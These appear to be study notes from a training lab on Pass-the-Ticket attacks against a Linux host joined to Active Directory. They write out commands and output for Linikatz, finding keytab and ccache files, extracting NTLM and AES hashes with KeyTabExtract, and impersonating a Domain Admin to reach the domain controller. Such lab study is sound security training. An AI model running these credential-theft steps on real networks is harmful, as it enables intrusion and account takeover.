PtT From Linux
Although uncommon, Linux can also be a part of the Active Directory; when it does, usually Kerberos authenticates.
Summary: if we find a Linux connected to Active Directory, we can leverage Kerberos to move laterally to other hosts (those hosts may be in a special group that will allow us to gain access to the Domain Controller, etc). The two files we are interested in are ccache and keytab. Of course, to leverage these files to perform a PtK attack and impersonate another user, we need local elevated (root) privileges.
Table of Contents
- General Information
- Connecting to Port-forwarded Linux on Windows Machine
- Identify if a Linux machine is Domain-Joined w/ Active Directory
- Discovery! Find Kerberos Ticket in Linux
- Linikatz to extract keytab and ccache files
- Finding Keytab Files
- Finding ccache Files
if we have root/privilege, search for users who are logged on, find theirccachefile and impersonate them
- Exploitation! Abuse the discoveries
- Keytab
- Find out which user the keytab file belongs to using klist
- Impersonate a user with keytab using kinit
- Extracting Keytab Hashes with KeyTabExtract
get the hash! either we crack the hash or perform PtH attack or PtT from Windows attack
- ccache
- Keytab
Context
we find a Linux machine connected to the Active Directory, we can perform PtT attack to impersonate other users
ccache files
In most cases, Linux store Kerberos tickets as ccache files in /tmp (requires elevated privileges to read/write the files)
KRB5CCNAME
By default, Kerberos ticket is stored in environment variable KRB5CCNAME
keytab files
keytab files (useful Kerberos in Linux) contains pairs of Kerberos keys, allow authenticate to remote systems without entering password. Also allows scripts to authenticate automatically.
Note: Any computer with Kerberos client installed can create keytab files. Keytab files can be created on one computer and copied for use on other computers because they are not restricted to the systems on which they were initially created.
Connecting to Port-forwarded Linux on Windows Machine
We can only access MS01. Only MS01 can access the Linux machine. The Linux Machine forwarded its port TCP 22 to MS01's port 2222.
we can connect to the linux machine as follows:
ssh david@inlanefreight.htb@10.129.204.23 -p 2222
Identify if a Linux machine is Domain-Joined w/ Active Directory
Realm
check by command
realm list
david@inlanefreight.htb@linux01:~$ realm list
inlanefreight.htb
type: kerberos
realm-name: INLANEFREIGHT.HTB
domain-name: inlanefreight.htb
configured: kerberos-member
server-software: active-directory
client-software: sssd
required-package: sssd-tools
required-package: sssd
required-package: libnss-sss
required-package: libpam-sss
required-package: adcli
required-package: samba-common-bin
login-formats: %U@inlanefreight.htb
login-policy: allow-permitted-logins
permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
permitted-groups: Linux Admins
revealed that
- the machine is configured as a Kerberos Member
- the domain name is inlanefreight.htb
- user
davidandjulioare permitted to login - group
Linux Adminsare permitted to login
if realm is unavailable,
winbind
david@inlanefreight.htb@linux01:~$ ps -ef | grep -i "winbind\|sssd"
root 2140 1 0 Sep29 ? 00:00:01 /usr/sbin/sssd -i --logger=files
root 2141 2140 0 Sep29 ? 00:00:08 /usr/libexec/sssd/sssd_be --domain inlanefreight.htb --uid 0 --gid 0 --logger=files
root 2142 2140 0 Sep29 ? 00:00:03 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root 2143 2140 0 Sep29 ? 00:00:03 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
Finding Kerberos Ticket in Linux
Linikatz to extract keytab and ccache files
wget https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
/opt/linikatz.sh
Linikatz is a Linux tool similar to Mimikatz, created by Cisco to exploit credentials on Linux machines integrated with Active Directory.
- Requires root access to run.
- Extracts credentials, including Kerberos tickets, from systems like FreeIPA, SSSD, Samba, etc.
- Saves credentials in a folder named
linikatz...with formats like ccache and keytabs, ready for use.
Finding Keytab Files
find keyword
find / -name *keytab* -ls 2>/dev/null
david@inlanefreight.htb@linux01:~$ find / -name *keytab* -ls 2>/dev/null
<SNIP>
131610 4 -rw------- 1 root root 1348 Oct 4 16:26 /etc/krb5.keytab
262169 4 -rw-rw-rw- 1 root root 216 Oct 12 15:13 /opt/specialfiles/carlos.keytab
in Cronjobs
keytab files do not necessarily have to have the extension .keytab. Maybe we could find it in Cronjob scripts.
carlos@inlanefreight.htb@linux01:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
<SNIP>
#
# m h dom mon dow command
*5/ * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
carlos@inlanefreight.htb@linux01:~$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash
kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls' -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
the above script used kinit which indicates that Kerberos is in use. kinit allows interaction w/ Kerberos. It requests User's TGT and store it in the cache ccache
the script imports a Kerberos ticket svc_workstations.kt for user svc_workstations@INLANEFREIGHT.HTB
Note: As seen in Pass the Ticket Windows section, a computer account needs a ticket to interact with AD environment. Similarly, a Linux domain joined machine needs a ticket. The ticket is represented as a keytab file located by default at /etc/krb5.keytab and can only be read by the root user. If we gain access to this ticket, we can impersonate the computer account LINUX01$.INLANEFREIGHT.HTB
Finding ccache files
Look at the environment variable that points to the ccache file
env | grep -i krb5
david@inlanefreight.htb@linux01:~$ env | grep -i krb5
KRB5CCNAME=FILE:/tmp/krb5cc_647402606_qd2Pfh
Searching for ccache file
ls -la /tmp
david@inlanefreight.htb@linux01:~$ ls -la /tmp
total 68
drwxrwxrwt 13 root root 4096 Oct 6 16:38 .
drwxr-xr-x 20 root root 4096 Oct 6 2021 ..
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 6 16:38 krb5cc_647401106_tBswau
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 6 15:23 krb5cc_647401107_Gf415d
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 6 15:43 krb5cc_647402606_qd2Pfh
Exploiting Keytab Files
with a Keytab file, we can impersonate a user using kinit
Find out which user the keytab file belongs to using klist
klist -k -t /opt/specialfiles/carlos.keytab
david@inlanefreight.htb@linux01:~$ klist -k -t /opt/specialfiles/carlos.keytab
Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp Principal
---- ------------------- ------------------------------------------------------
1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB
Impersonate a user with keytab using kinit
Note: To keep the ticket from the current session, before importing the keytab, save a copy of the ccache file present in the environment variable KRB5CCNAME.
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
verify:
klist
verify by accessing SMB:
david@inlanefreight.htb@linux01:~$ smbclient //dc01/carlos -k -c ls
. D 0 Thu Oct 6 14:46:26 2022
.. D 0 Thu Oct 6 14:46:26 2022
carlos.txt A 15 Thu Oct 6 14:46:54 2022
7706623 blocks of size 4096. 4452852 blocks available
process showing:
david@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: david@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:02:11 10/07/22 03:02:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:02:11
david@inlanefreight.htb@linux01:~$ kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab
david@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/06/22 17:16:11 10/07/22 03:16:11 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/07/22 17:16:11
Extracting Keytab Hashes with KeyTabExtract
python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
david@inlanefreight.htb@linux01:~$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : INLANEFREIGHT.HTB
SERVICE PRINCIPAL : carlos/
NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
With NTLM hash, we can perform a PtH attack. With the AES256 or AES128 hash, we can forge our tickets using Rubeus or attempt to crack the hashes to obtain the plaintext password.
crack the hash by using Hashcat as seen in Attacking SAM and Attacking LSASS, or John The Ripper. we can also do it at
https://crackstation.net
Login after cracking the password
david@inlanefreight.htb@linux01:~$ su - carlos@inlanefreight.htb
Password:
carlos@inlanefreight.htb@linux01:~$ klist
Ticket cache: FILE:/tmp/krb5cc_647402606_ZX6KFA
Default principal: carlos@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 11:01:13 10/07/2022 21:01:13 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:01:13
Exploiting ccache file
we need root privileges to read the ccache file
1. Connecting to Port-forwarded Linux on Windows Machine
2. confirm we have root privileges sudo -l
3. log in as root sudo su
4. Finding ccache files
nux01:~# ls -la /tmp
total 76
drwxrwxrwt 13 root root 4096 Oct 7 11:35 .
drwxr-xr-x 20 root root 4096 Oct 6 2021 ..
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_HRJDux
-rw------- 1 julio@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 11:35 krb5cc_647401106_qMKxc6
-rw------- 1 david@inlanefreight.htb domain users@inlanefreight.htb 1406 Oct 7 10:43 krb5cc_647401107_O0oUWh
-rw------- 1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Oct 7 11:21 krb5cc_647401109_D7gVZF
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 3175 Oct 7 11:35 krb5cc_647402606
-rw------- 1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct 7 11:01 krb5cc_647402606_ZX6KFA
say that the user julio, we don't have access to. Let's exploit ccache to impersonate him.
5. identify which group julio belongs to
root@linux01:~# id julio@inlanefreight.htb
uid=647401106(julio@inlanefreight.htb) gid=647400513(domain users@inlanefreight.htb) groups=647400513(domain users@inlanefreight.htb),647400512(domain admins@inlanefreight.htb),647400572(denied rodc password replication group@inlanefreight.htb)
julio is a member of the Domain Admins group. We can attempt to impersonate julio and gain access to the DC01 Domain Controller host.
6. impersonate julio
copy the ccache files here
cp /tmp/krb5cc_647401106_I8I133 .
make env variable point to julio's ccache
export KRB5CCNAME=/root/krb5cc_647401106_I8I133
verify
klist
Pay attention if ticket expired. If expired can't use it no more.
root@linux01:~# klist
klist: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 13:25:01 10/07/2022 23:25:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 13:25:01
root@linux01:~# smbclient //dc01/C$ -k -c ls -no-pass
$Recycle.Bin DHS 0 Wed Oct 6 17:31:14 2021
Config.Msi DHS 0 Wed Oct 6 14:26:27 2021
Documents and Settings DHSrn 0 Wed Oct 6 20:38:04 2021
john D 0 Mon Jul 18 13:19:50 2022
julio D 0 Mon Jul 18 13:54:02 2022
pagefile.sys AHS 738197504 Thu Oct 6 21:32:44 2022
PerfLogs D 0 Fri Feb 25 16:20:48 2022
Program Files DR 0 Wed Oct 6 20:50:50 2021
Program Files (x86) D 0 Mon Jul 18 16:00:35 2022
ProgramData DHn 0 Fri Aug 19 12:18:42 2022
SharedFolder D 0 Thu Oct 6 14:46:20 2022
System Volume Information DHS 0 Wed Jul 13 19:01:52 2022
tools D 0 Thu Sep 22 18:19:04 2022
Users DR 0 Thu Oct 6 11:46:05 2022
Windows D 0 Wed Oct 5 13:20:00 2022
7706623 blocks of size 4096. 4447612 blocks available